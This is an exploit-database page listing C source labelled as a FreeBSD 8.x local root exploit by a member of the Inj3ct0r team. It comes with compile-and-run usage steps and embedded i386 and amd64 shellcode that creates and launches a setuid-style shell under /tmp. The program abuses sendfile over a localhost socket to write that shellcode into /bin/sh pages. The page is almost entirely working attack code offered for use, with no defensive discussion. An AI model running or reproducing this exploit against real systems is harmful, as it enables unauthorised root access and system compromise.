bsd/x86 Ver. 8.x - Local Root Exploit



EKU-ID: 2653 CVE: OSVDB-ID:
Author: TAURUS OMAR Published: 2012-09-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


 

/*
 *
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0      _                   __           __       __                      1
 * 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 * 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 * 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 * 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 * 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 * 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 * 1                   \ \____/ >> Exploit database separated by exploit    0
 * 0                    \/___/          type (local, remote, DoS, etc.)     1
 * 1                                                                        1
 * 0   [x] Official Website: http://www.1337day.com                         0
 * 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 * 0                                                                        0
 * 1               ==========================================               1
 * 0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
 * 1               ==========================================               0
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
 * |                                                                        |
 * |                 BSD/x86  Ver. 8.x - Local Root Exploit                 |     
 * --------------------------------------------------------------------------
 * 
 * +----------------| ABOUT ME |--------------------+
 * NAME:     TAURUS OMAR                            -
 * LINE:     INDEPENDENT SECURITY RESEARCHER        -
 * HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
 * TWITTER:  @taurusomar_                           -
 * E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
 * E-MAIL:   omar-taurus[at]live[dot]com            -
 * PWNED:    #ZUUU                                  -
 * +------------------------------------------------+ 
 *
 *
 * +-------------------------------+
 * Proof of CONCEPT IMAGES 
 * http://i.imgur.com/whR3E.jpg
 * +-------------------------------+
 * Usage: 
 * gcc 1337.c -o 1337
 * chmod 777 1337
 * ./1337
 *
 */

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/proc.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
 
main (int argc, char *argv[]) {
        int s, f, k2;
        struct sockaddr_in addr;
        int flags;
        char str32[]=
"\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
        char str64[]=
"\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
"\xe7\x57\x52\x48\x89\xe6\x0f\x05";
 
        char buf[20000];
 
        char *p;
        struct stat sb;
        int n;
        fd_set wset;
        int64_t size;
        off_t sbytes;
        off_t sent = 0;
        int chunk;
        int arch = 3;
 
        if (argc != 2) {
                printf("Definiendo Arquitectura.\n");
                return;
        }
 
        if (strcmp(argv[1], "i386") == 0)
                arch=1;
 
        if (strcmp(argv[1], "amd64") == 0)
                arch=2;
 
        if (arch == 3) {
                printf("Arquitectura Definida i386 or amd64\n");
                return;
        }
 
        s = socket(AF_INET, SOCK_STREAM, 0);
        bzero(&addr, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(7030);
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 
        n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
        if (n < 0)
                warn ("fail to connect");
 
        f = open("/bin/sh", O_RDONLY);
        if (f<0)
                warn("fail to open file");
        n = fstat(f, &sb);
        if (n<0)
                warn("fstat failed");
 
        size = sb.st_size;
        chunk = 0;
 
        flags = fcntl(f, F_GETFL);
        flags |= O_NONBLOCK;
        fcntl(f, F_SETFL, flags);
 
        while (size > 0) {
 
                FD_ZERO(&wset);
                FD_SET(s, &wset);
                n = select(f+1, NULL, &wset, NULL, NULL);
                if (n < 0)
                        continue;
 
                if (chunk > 0) {
                        sbytes = 0;
                        if (arch == 1)
                        n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
                        if (arch == 2)
                        n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
                        if (n < 0)
                                continue;
                        chunk -= sbytes;
                        size -= sbytes;
                        sent += sbytes;
                        continue;
                }
 
                chunk = 2048;
 
                memset(buf, '\0', sizeof buf);
                if (arch == 1) {
                        for (k2=0;k2<256;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str32, sizeof str32);
 
                        n = k2 + sizeof str32;
                        p = buf;
                }
 
                if (arch == 2) {
                        for (k2=0;k2<100;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str64, sizeof str64);
 
                        n = k2 + sizeof str64;
                        p = buf;
                }
 
                write(s, p, n);
        }
}